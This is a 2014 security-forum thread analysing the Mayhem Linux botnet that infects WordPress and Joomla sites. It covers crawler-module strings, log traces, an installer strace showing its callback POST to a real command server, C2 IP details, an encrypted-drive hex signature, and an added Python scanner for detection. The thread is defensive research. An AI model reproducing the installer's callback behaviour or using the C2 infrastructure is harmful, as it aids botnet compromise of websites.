 #23521  by unixfreaxjp
 Wed Aug 06, 2014 6:03 am
Latest incident Mayhem samples analyzed in here: http://pastebin.com/VPpjSzxx
PHP dropper: https://www.virustotal.com/en/file/03c8 ... /analysis/
ELF installer x32: https://www.virustotal.com/en/file/8983 ... /analysis/
ELF installer x64: https://www.virustotal.com/en/file/77d7 ... /analysis/
Mayhem ELF CMS URL crawler module: https://www.virustotal.com/en/file/3d07 ... /analysis/
Mayhem ELF Wordpress/Joomla! password bruter module: https://www.virustotal.com/en/file/3ec6 ... /analysis/

If you work in AV, please make an effort to raise the detection ratio of these ELFs. Thx

#MalwareMustDie!!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Use RAR5; pwd: infected
Note (KM members only): except for the encrypted drive, almost all was cracked. Need a fix in the reader C code (on it)

 #23522  by unixfreaxjp
 Wed Aug 06, 2014 6:30 am
A week ago's Mayhem incident. Starting from this one, a new installer code was started, giving up the libworker.so name for more generic namings:
Image

PHP Installer (dropper): https://www.virustotal.com/en/file/dddb ... /analysis/
Code snips: http://pastebin.com/xa4sGV5a
ELF x32 Mayhem Installer: https://www.virustotal.com/en/file/803d ... /analysis/
ELF x64 Mayhem Installer: https://www.virustotal.com/en/file/9191 ... /analysis/

This is the installer's callback:
Image

I attached PCAP, PHP dropper snips & .so installer samples. See comment (members only).
Please help to raise the detection ratio of these ELFs.

#MalwareMustDie!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Use RAR5, pwd: infected
cnc sinkholed

 #23523  by unixfreaxjp
 Wed Aug 06, 2014 6:50 am
This is a special post; I want to explain the ELF Mayhem crawler.so, a web remote-trigger component/module of Mayhem.
It works to trigger the Mayhem installer (PHP) or activate some remote injection.
It is the most used module in the Mayhem package by the moronz who use it (you used to call these "operators" or "bad actors").
The attacker uses this via the Mayhem GUI to connect to a Mayhem-infected site to attack ANOTHER, newly infected site.
The crawler code is simple, as seen below; it is a good parameter to block this module's operation.
Code:
0x01808    CRAWL %s level exceeded
0x01821    GET %s HTTP/1.0
0x01832    Host: %s
0x0183F    >,%s,%s%s
0x0184A    http://
0x01857    GET %s%s HTTP/1.0
0x0186A    Host: %s
0x01877    >,%s,%s%s%s
0x01884    >,%s,%s
0x0188D    Q,crawler,%s,new domains %d%s
0x018AC    Q,crawler,%s,-
0x018BC    crawler
0x018E8    /wp-login.php
0x018F6    name="log"
0x01901    /administrator/index.php
0x0191A    joomla
Aiming at infected Joomla! and WordPress sites.

You'll see traces of this crawler's usage in your server's log, as below:
Code:
ns312431.ip-188-165-217.eu - - [31/Jul/2014:11:02:44 +0900] "GET /wp-content/plugins/XXXX/404.php HTTP/1.1" 200 95 "-" "-" "-"
-rw-rw-rw- 1 XXXX cst 6624 Jul 31 11:03 crawler.so
So it is remotely executable, not necessarily via LD_PRELOAD, the same as the bruteforce.so and cmsurls.so posted previously. And it was all compiled as a package, as per the UI snapshot announced by the Yandex team here: https://www.virusbtn.com/virusbulletin/ ... -fig17.jpg

VirusTotal detection is ..low.. I mean..it is 1 (one)..repeat..ONE! (1/53) https://www.virustotal.com/en/file/637a ... 406876476/

If you work in AV and your AV has a Linux scanner product, please make sure your product can scan this, because I found this module in MOSTLY all Mayhem-infected sites now, and they are all undetected (sigh..).

Sample is attached (members only). #MalwareMustDie!!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Use RAR5, pwd: infected
Ping me questions to @malwaremustdie or use PM. Please bear with delays.

 #23524  by unixfreaxjp
 Wed Aug 06, 2014 8:05 am
This is the Mayhem incident of July 30th. The attacker was detected installing the installer, as per the log snippet below:
Code:
178-137-18-246-lvv.broadband.kyivstar.net - - [28/Jul/2014:01:16:02 +0900] "GET /wp-content/themes/XXXX/styleimg.php HTTP/1.1" 200 85 "-" "Python-urllib/2.7" "-"
You can see the installer in the attached file (with the binary stripped, sorry).
This installer will create the encrypted drive ".fghv". This drive has typical signatures in the first sector, as:
Code:
0000   23 74 FA 49 37 F6 DF D0 17 72 08 E1 B1 73 B3 1D    #t.I7....r...s..
0010   B4 D9 54 45 38 5A A9 AB 5D E8 BE 47 30 99 69 EE    ..TE8Z..]..G0.i.
0020   FD FB 8F DB 18 46 E9 31 72 9B 45 0D 03 ED 2E FB    .....F.1r.E.....
0030   BF 0E FB B6 80 F6 40 70 2E 55 57 96 EB EF AC E6    ......@p.UW.....
0040   D8 D4 E9 DE D9 1E 13 F7 D8 D4 E9 DE D9 1E 13 F7    ................
Note: I think one can apply this signature in Yara or an AV scanner to check whether the server is infected.
The tools in below links can be used to read this drive:
http://ultra-embedded.com/fat_filelib
https://github.com/freeoks/SD0_reader
The drive was mounted in every Mayhem infection with the read/write flag; in memory it is seen as:
Code:
host    15448  mmd  mem    REG   RW 9,2 12582912 29763122 /home/mmd/0x02E/007/.fghv
Inside, you will see the files used for the attack, as announced by the Yandex team here: https://www.virusbtn.com/virusbulletin/ ... -fig11.jpg

In this post I will (generally) debug the installer, with some comments.
The point of this information is to form mitigations for the threat's installation.

1. Since the nature of the installation needs LD_PRELOAD interception of the NIX API called /usr/bin/host, you will see every Mayhem infection loading these modules (i.e. in x64):
Code:
 /lib/x86_64-linux-gnu/libnss_dns-2.13.so
 /lib/x86_64-linux-gnu/libnss_files-2.13.so
 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
 /lib/x86_64-linux-gnu/libm-2.13.so
 /lib/x86_64-linux-gnu/liblzma.so.5.0.0
 /lib/x86_64-linux-gnu/libattr.so.1.1.0
 /usr/lib/libisccc.so.80.0.2
 /lib/x86_64-linux-gnu/libz.so.1.2.7
 /lib/x86_64-linux-gnu/libresolv-2.13.so
 /lib/x86_64-linux-gnu/libkeyutils.so.1.4
 /usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
 /lib/x86_64-linux-gnu/libcom_err.so.2.1
 /usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
 /usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
 /usr/lib/libGeoIP.so.1.4.8
 /lib/x86_64-linux-gnu/libc-2.13.so
 /usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
 /lib/x86_64-linux-gnu/libpthread-2.13.so
 /lib/x86_64-linux-gnu/libcap.so.2.22
 /lib/x86_64-linux-gnu/libdl-2.13.so
 /usr/lib/libisc.so.84.1.0
 /usr/lib/libisccfg.so.82.0.3
 /usr/lib/libbind9.so.80.0.7
 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
 /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
 /usr/lib/libdns.so.88.1.1
 /usr/lib/liblwres.so.80.0.3
 /home/mmd/0x02E/007/libworker.so
 /lib/x86_64-linux-gnu/ld-2.13.so
libworker.so is the malware, libnss is used to resolve DNS, and some modules are specifically used by the malware itself (self-explanatory, i.e. the crypto & GeoIP ones).

2. Mayhem installer process:
(malware installer blah.so started with initial PID)

// process self-detached execution after /usr/bin/host was executed:
Code:
execve("/home/mmd/0x02E/007/1.20322", ["/home/mmd/0x02E/007/1.20322"], [/* 20 vars */]) = 0
// local addr INET
Code:
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS SETTING")}, 16) = 0
getsockname(6, {sa_family=AF_INET, sin_port=htons(47377), sin_addr=inet_addr("YOUR_IP")}, [16]) = 0
// uname executed by shell escape:
Code:
execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73 <unfinished ...>
// read the ELF after reforked beforehand..
Code:
read(8, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
fstat(8, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
// self deletion..creating the encrypted drive:
Code:
unlink("/home/mmd/0x02E/007/libworker.so") = 0
open(".fghv", O_RDWR)       = 8
// reforked, attempt to access "/" (server's root), self closing +open /dev/null..
Code:
clone(Process xxx attached
umask(0)                    = 022
setsid()                    = 20333
chroot("/")                 = -1 EPERM (Operation not permitted)
  :
close(0)                    = 0
close(1)                    = 0
  :
close(1021)                 = -1 EBADF (Bad file descriptor)
close(1022)                 = -1 EBADF (Bad file descriptor)
  :
open("/dev/null", O_RDONLY) = 2
open("/dev/null", O_RDONLY) = 3
// preparing sending DNS request..
Code:
open("/etc/resolv.conf", O_RDONLY) = 4
uname({sys="Linux", node="1x111", ...}) = 0
connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
open("/etc/nsswitch.conf", O_RDONLY) = 4
read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
open("/etc/ld.so.cache", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
// querying IP address for the CNC..
Code:
socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\242U\1\0\0\1\0\0\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
recvfrom(4, "\242U\201\200\0\1\0\1\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 49
// callback sent:
Code:
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("62.75.179.242")}, 16) = 0
write(4, "POST /go.php HTTP/1.0\r\nHost: imb"..., 173) = 173
read(4, "HTTP/1.1 404 Not Found\r\nServer: "..., 32768) = 367
read(4, "", 32768)          = 0
This CNC is in Germany, an abused host; I wrote this for the LE follow-up as a verdict:
Code:
$ echo 62.75.179.242   |bash origin.sh
62.75.179.242|static-ip-62-75-179-242.inaddr.ip-pool.com.|8972 | 62.75.128.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG
3. Samples for this incident are attached with the PCAP. (members only)
In VT, the
x32 installer ELF: https://www.virustotal.com/en/file/4275 ... 406866832/
x64 installer ELF: https://www.virustotal.com/en/file/dce6 ... 406866857/

If you work in an AV entity and support Linux/FreeBSD OS in your marketing pamphlets, please help to raise the detection ratio of this threat by registering the shared sample. This threat is no joke; it aims at all of WordPress and Joomla to be a huge CHAOS botnet..

#MalwareMustDie!
+) basic knowledge of the threat: http://blog.malwaremustdie.org/2014/05/ ... lware.html
Use RAR5, pwd: infected
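Added example (my own code, not the poster's or the MalwareMustDie tooling): a small defender-side scanner in Python that turns two artefacts from this thread into checks, the first-sector bytes of the ".fghv" drive from the hex dump in this post and the format strings listed from crawler.so in the post above. The web-root layout in demo() is constructed, and the threshold of three crawler strings before flagging a file is my assumption.

```python
import os, tempfile
from typing import Dict, List

# First 0x50 bytes of the ".fghv" drive, transcribed from the hex dump in the post.
FGHV_SECTOR_SIG = bytes.fromhex(
    "2374FA4937F6DFD0177208E1B173B31D" "B4D95445385AA9AB5DE8BE47309969EE"
    "FDFB8FDB1846E931729B450D03ED2EFB" "BF0EFBB680F640702E555796EBEFACE6"
    "D8D4E9DED91E13F7D8D4E9DED91E13F7")
# Format strings listed from the crawler.so module in the post above.
CRAWLER_MARKERS = [b"CRAWL %s level exceeded", b"Q,crawler,%s,new domains %d%s",
                   b"Q,crawler,%s,-", b"/wp-login.php", b'name="log"',
                   b"/administrator/index.php", b"joomla"]

def is_fghv_drive(head: bytes) -> bool:
    """True when a file starts with the .fghv first-sector bytes."""
    return head[:len(FGHV_SECTOR_SIG)] == FGHV_SECTOR_SIG

def crawler_marker_hits(blob: bytes) -> List[bytes]:
    """crawler.so strings found in blob; several together is the useful signal."""
    return [m for m in CRAWLER_MARKERS if m in blob]

def scan_tree(root: str, min_hits: int = 3, max_read: int = 2 << 20) -> Dict[str, List[str]]:
    """Walk root; flag .fghv headers and files carrying crawler.so strings."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(max_read)
            except OSError:
                continue  # unreadable or vanished file
            reasons = []
            if is_fghv_drive(head):
                reasons.append("fghv-header")
            hits = crawler_marker_hits(head)
            if len(hits) >= min_hits:  # "joomla" alone is far too common to flag (assumed threshold)
                reasons.append("crawler-strings:" + ",".join(h.decode() for h in hits))
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def demo() -> Dict[str, List[str]]:
    """Constructed web root: a hidden .fghv, a crawler.so-like blob and a clean file."""
    root = tempfile.mkdtemp()
    files = {".fghv": FGHV_SECTOR_SIG + b"\x00" * 432,
             "wp-content/plugins/x/crawler.so": b"\x7fELF" + b"\x00".join(CRAWLER_MARKERS[:4]),
             "index.php": b"<?php echo 'hi'; ?>"}
    for rel, data in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return scan_tree(root)
```

Run scan_tree() against a real web root to get the same mapping of relative path to reasons; the 0x40 row of the dump repeats one 8-byte group twice, so a sector check on the full 80 bytes is stricter than matching the first few bytes only.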
 #23780  by K_Mikhail
 Thu Sep 04, 2014 4:56 pm
Here is a more up-to-date list of Mayhem .so binaries (SHA1s):
PHP dropper list (SHA1s):
Files with SHA1s:
5ddebe39bdd26cf2aee202bd91d826979595784a
6992ed4a10da4f4b0eae066d07e45492f355f242

are still absent.
 #24073  by unixfreaxjp
 Tue Oct 07, 2014 6:50 am
#Shellshock version spotted. Installer is in Perl: http://pastebin.com/rdTJ4HyJ
Use my small script to extract the binaries safely here: https://gist.github.com/unixfreaxjp/aca ... ede2c70cde
I will not disclose the Shellshock used since a higher security matter is involved.
Samples:
https://www.virustotal.com/en/file/4e9c ... 412653706/
https://www.virustotal.com/en/file/87f7 ... 412653725/
At this moment, the things that I can share are what is written in the VirusTotal comment.

CNC:
Code:
IP: 188.120.246.60
Reversed IP: dackjaniels.net.
ASN: 29182
CIDR: 188.120.240.0/21
ISP Prefix: ISPSYSTEM
Country: LU / Luxembourg
ISP: ISPSYSTEM.COM / ISPSYSTEM CJSC

Some snapshots as PoC of the CNC:
Image
7z/infected